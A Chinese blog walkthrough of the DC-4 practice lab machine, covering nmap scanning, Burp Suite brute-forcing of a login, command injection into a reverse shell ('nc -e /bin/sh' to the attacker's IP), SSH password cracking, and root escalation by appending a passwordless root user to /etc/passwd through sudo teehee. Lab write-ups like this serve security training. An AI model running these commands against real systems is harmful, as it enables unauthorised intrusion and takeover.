DC4靶机

本文描述了一次网络安全演练过程,首先通过Nmap扫描并确定靶机IP,然后利用BurpSuite进行密码爆破,成功获取登录。接着通过反弹shell和命令执行进一步渗透,发现并利用sudo提权,在系统中创建免密root用户,最终找到flag。
摘要由CSDN通过智能技术生成

第一步确定靶机和kali在同一网络模式下

确定自己的ip地址:192.168.91.129

 nmap 尝试扫描靶机的ip:192.168.91.1228 

 拿到靶机ip第一步就是去浏览器访问80端口的http服务

 是一个登录页面

开启bp,输入常用用户admin和超强弱密码123456.抓个包看看

 直接丢到intruder去

 给和密码加上&准备爆破

 开始爆破

 爆破到密码为happy

 用admin:hayyp登录页面

 成功进入,点击command继续深入

 点击command,可以看到可以选择任意一个命令执行

 抓个包看看

 那是不是可以将ls -l换成一个反弹shell呢,先在kali开启监听

将ls+-l改成nc -e /bin/sh 192.168.91.129 8888,点击forward放行。

 反弹成功

 进来后先交互一下

 在家目录下发现三个用户

 在jim里有三个文件

 找到了一个存放密码的文件

 将所有密码拷贝,粘贴到kali的root目录下

 对jim用户进行密码爆破,字典就用刚才找到的1.txt

 成功爆破到密码

 ssh远程登录

jim:jibril04

 登录成功,但是登录的时候它多出来一句话,可以翻译下看看

进过查找, 在var目录发现mail,打开jim的邮件看看

 又找到了一个用户和密码

 Charles:^xHhA&hvim0y

既然找到了,那就进去看看

 成功进入,但是进的时候要注意把用户大写的C换成小写

find / -perm -4000 -print 2>/dev/null 查看提权方式

可以用sudo提权

利用teehee的root权限在passwd中写入一个免密的root权限用户

echo "love::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

成功进入

 寻找flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值